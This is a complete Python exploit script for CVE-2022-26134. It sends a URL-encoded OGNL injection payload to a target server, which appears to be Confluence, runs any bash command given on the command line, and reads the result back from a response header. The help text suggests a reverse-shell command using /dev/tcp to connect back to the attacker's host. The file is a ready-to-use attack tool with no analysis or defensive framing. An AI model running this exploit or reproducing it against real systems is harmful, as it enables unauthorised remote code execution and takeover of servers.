CVE-2022-26134.py

# !/usr/bin/python3
import argparse

import requests
from requests.packages import urllib3

urllib3.disable_warnings()
session = requests.Session()


def banner():
    b = '''
   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    '''
    print(b)


def send_exp(url: str, cmd: str):
    exp = "/${(#l=new java.util.ArrayList()).(#l.add(\"/bin/bash\")).(#l.add(\"-c\")).(#l.add(\"" \
          + cmd + "\")).(#a=@org.apache.commons.io.IOUtils@toString(" \
                  "new java.lang.ProcessBuilder(#l).start().getInputStream(),\"utf-8\"))." \
                  "(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}/"
    exp = str_to_url(exp)
    exp_url = url + exp
    print(f"发送請求：{url}")
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chro'
                      'me/53.0.2785.104 Safari/537.36 Core/1.53.2372.400 QQBrowser/9.5.10548.400'
    }
    try:
        response = requests.get(exp_url, allow_redirects=False, headers=headers, verify=False)
        if response.status_code == 302 and 'X-Cmd-Response' in response.headers:
            result = str(response.headers['X-Cmd-Response'])
            return result
        else:
            return "命令执行失败"
    except requests.exceptions.ConnectionError:
        return 'Failed to Connect: ' + url
    except Exception as e:
        return e


def str_to_url(string):
    b = ["{", "}", "'", "(", ")", "@", "\"", "#", "=", "$", ",", ";", " ", "\\", "[", "]"]
    news = ""
    for s in string:
        if s in b:
            news += "%" + str(hex(ord(s)))[2:].upper()
        else:
            news += s
    return news


def exploit(url, cmd):
    return send_exp(url, cmd)


if __name__ == "__main__":
    banner()
    parser = argparse.ArgumentParser(description='CVE-2022-26134')
    parser.add_argument('-t', '--target', dest='target', type=str, required=True, help='目标URL')
    parser.add_argument('-c', '--command', dest='command', type=str, required=True, help='执行命令,eg:bash -i >& '
                                                                                         '/dev/tcp/{your ip}/{port} '
                                                                                         '0>&1')
    options = parser.parse_args()
    print("执行结果:"+exploit(options.target, options.command))